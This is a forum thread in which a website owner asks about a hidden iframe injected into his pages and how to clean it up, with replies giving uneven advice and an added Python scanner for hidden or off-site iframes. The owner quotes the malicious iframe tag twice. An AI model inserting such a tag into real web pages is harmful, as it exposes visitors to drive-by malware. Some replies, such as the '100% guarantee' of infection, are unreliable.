View Full Version : newbie security questions


Bobby Maxden
07-29-2009, 11:34 PM
I just removed some apparently injected code from a few pages that had a hidden iframe.

<iframe src="http://example.ru:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden">


I have also changed my FTP password.


A couple of questions:

1. If I remove the code from all pages on the server, does it mean the Trojan is gone, or does it still live on the server somehow?

2. If a Trojan or bad code like what I pasted above is in one page, can it spread to other pages by itself, or is it only FTP-injected once?

3. If a Trojan or bad code like what I pasted above is pasted elsewhere (like in this forum post), can it become active where it is pasted?

4. When I was testing my site, I would go to the page I knew had the bad code in it and I would see 2" of white space at the top of my page. Then, of course, when I looked at the code I saw the hidden iframe. Then I hit the refresh button on that page and I could see in the status bar the browser trying to connect, or possibly connecting, to the example.ru website. So the question is, if my computer was not infected and I hit the refresh button, would that infect my computer?


Finally, some of these questions arise because I don't know how far I have to go to "clean" everything. Do I have to reinstall the OS locally and wipe the server clean too?


It's a bit more complicated because I recently hired an Eastern European company to work on a new version of my site and I also suspect they might have somehow caused this (not intentionally... they have very high ratings on Elance anyway, FWIW). But they did access the server a couple of times (and I always changed the password after).

So how do I know it's not me or if it's them??? Sorry about the confusion!

Jazz914
07-30-2009, 02:55 AM
All of the things you stated are conditional.

1) Do you run your server from home?
2) Do you use the server which runs your website? (Not recommended)
3) Where was the code that was redirecting you:
a) In the file source
b) An external source like a MySQL database?
4) Is the iframe just on your site or is it on other sites, like when you go to Google or something?

Bobby Maxden
07-30-2009, 03:48 AM
1) Do you run your server from home?

No... current is 1 and 1 hosting.

2) Do you use the server which runs your website? (Not recommended)

No.

3) Where was the code that was redirecting you:
a) In the file source

top of the body code:

</head>
<body>
<iframe src="http://example:8080/ts/in.cgi?pepsi119" width=125 height=125 style="visibility: hidden"></iframe>
<div id="masthead">


b) An external source like a MySQL database?

I don't know this because I had the developer clean up the blog (the only dynamic section of the site). The blog is accessible again (it wasn't last night; the page just threw PHP errors), but the dev didn't fully clean the site either. They told me they did, but when I checked it today I found one page with the iframe still in it. That's why I'm trying to do some self-study.


But I will ask the dev...


4) Is the iframe just on your site or is it on other sites, like when you go to Google or something?

The URL is listed on MalwareURL.com as bad and it seemed to be in a few other Google results.

Jazz914
07-30-2009, 04:10 AM
It's nothing to do with your server; 1and1 would have that protected.

Because you are getting redirected to the same site from other sources, it's likely you have the virus. Sometimes when you have a virus like this it will block you from using Windows Update. Check to see if you can update; if you can't, or the page just never loads / is blank, it's a 100% guarantee you have a virus. If you can go into Windows Update it's still 90% sure you're infected, but better safe than sorry :P

I suggest scanning your computer with something like
Spybot Search & Destroy (free) or McAfee Security Center (costs).
I have both.

Remember, whichever virus scanning program you use, after the first scan has completed, restart your computer and RESCAN, then restart your computer, go on the web and see if you still get the redirects.

After the scans are complete, check if you still get redirected; if you do, try ComboFix (http://www.bleepingcomputer.com/combofix/how-to-use-combofix). It is a really good program at getting rid of those pesky viruses which manage to get past your best defenses.

If you STILL get redirected (Doubt it)

Google the link you are being redirected to. Normally if it's a trojan/download or whatever, it will pop up with "remove {virus name}", and in the description it will say something like "I keep on getting redirected to {Insert Bad URL} when I click on a Google link", and sometimes there are instructions, which often suggest a ComboFix fix.

Quick Edit:

Forgot to mention this: does the developer get redirected as well?

Bobby Maxden
07-30-2009, 04:45 AM
The things you are describing don't seem like the case here (I have experienced what you are talking about).


This is code in my web pages on my server.


It has been seen elsewhere, such as by 1and1 support and the developer, accessed from Mac or PC.


A boot-time scan reveals nothing on my system (Mac or PC) and Windows updates normally.


It does try to redirect; it's a hidden iframe, but the page loads (though the page header/graphics are shifted down by about 2").

Then if you try to refresh the browser, you can see it attempting to load the bad/remote URL (but it doesn't fully parse the page; it just keeps loading in the status bar).

Bobby Maxden
07-30-2009, 05:04 AM
Here is the code:

http://i31.tinypic.com/2r7ncpj.jpg

Bobby Maxden
07-30-2009, 04:10 PM
Turns out the dev said that they did in fact have a virus on their server which somehow was transferred to my server. They said it has been cleaned.


If anyone is following this thread it would help to get some feedback, because even though I now know the source, most of my questions have not been answered. Given that I'm now kind of paranoid, I'd really like to know more about how these things work.

In addition to all the previous questions, how do I scan my server or a database if I want to?


Is it possible to scan for keywords?
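One way to do the keyword-style scan asked about in this post, as an added example rather than code from the thread or from the host: a small Python script that walks a copy of the document root and flags every iframe that is CSS-hidden or whose src points at a host other than your own (the own host www.example.com and the two sample files are constructed assumptions; the injected tag is the one quoted in the thread).

```python
import os
import re
import tempfile

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)          # any <iframe ...> opening tag
SRC_RE = re.compile(r'src\s*=\s*["\']?([^"\'\s>]+)', re.IGNORECASE)
HIDDEN_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

def suspicious_iframes(html, own_hosts=()):
    """Return (src, reason) for each iframe that is CSS-hidden or points off-site."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        tag = m.group(0)
        src_m = SRC_RE.search(tag)
        src = src_m.group(1) if src_m else ""
        reasons = []
        if HIDDEN_RE.search(tag):
            reasons.append("hidden via CSS")
        # For absolute URLs compare the host (port stripped) against our own hosts.
        host = re.sub(r"^https?://", "", src, flags=re.I).split("/")[0].split(":")[0]
        if src.lower().startswith("http") and host.lower() not in own_hosts:
            reasons.append("off-site src " + host)
        if reasons:
            hits.append((src, "; ".join(reasons)))
    return hits

def scan_tree(root, own_hosts=(), exts=(".html", ".htm", ".php")):
    """Walk a document root; return {relative path: [(src, reason), ...]} for flagged files."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = suspicious_iframes(fh.read(), own_hosts)
                if hits:
                    findings[os.path.relpath(path, root)] = hits
    return findings

def demo():
    """Constructed sample site: one clean page and one carrying the thread's injected iframe."""
    injected = ('</head>\n<body>\n<iframe src="http://example.ru:8080/ts/in.cgi?pepsi119" '
                'width=125 height=125 style="visibility: hidden"></iframe>\n<div id="masthead">')
    clean = '<body><iframe src="/widgets/map.html" width=300 height=200></iframe></body>'
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "blog"))
        for rel, body in (("index.html", clean), (os.path.join("blog", "post.php"), injected)):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        return scan_tree(root, own_hosts=("www.example.com",))   # own host is an assumption
```

Run it against a local download of the site rather than on the live host, and treat an off-site frame as something to look at, not proof of injection, since a legitimate embed from another host is reported the same way.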

Jazz914
07-30-2009, 04:41 PM
http://img266.imageshack.us/img266/2255/badurl.png <-- What happened when I went to the URL.

McAfee SiteAdvisor would have stopped me from going to your site xP

Anyway, it's hard to explain how these things work without actually knowing what type of virus it was.
If it was a trojan, what it does is disguise itself as something which you may want, e.g. an anti-virus, and when you download it, it will just seem to run like a normal antivirus when it is actually infecting you.

Viruses can transfer themselves via email, or attach themselves to file transfers, such as when you send a file over MSN.

You can't scan the server, and you can't scan the database. But you can ask the host to scan your server for you; as for the database, I'm not sure.

But scanning for keywords in the database may be possible to stop SQL injections alone, as you can't upload an exe to the database, unless I'm wrong.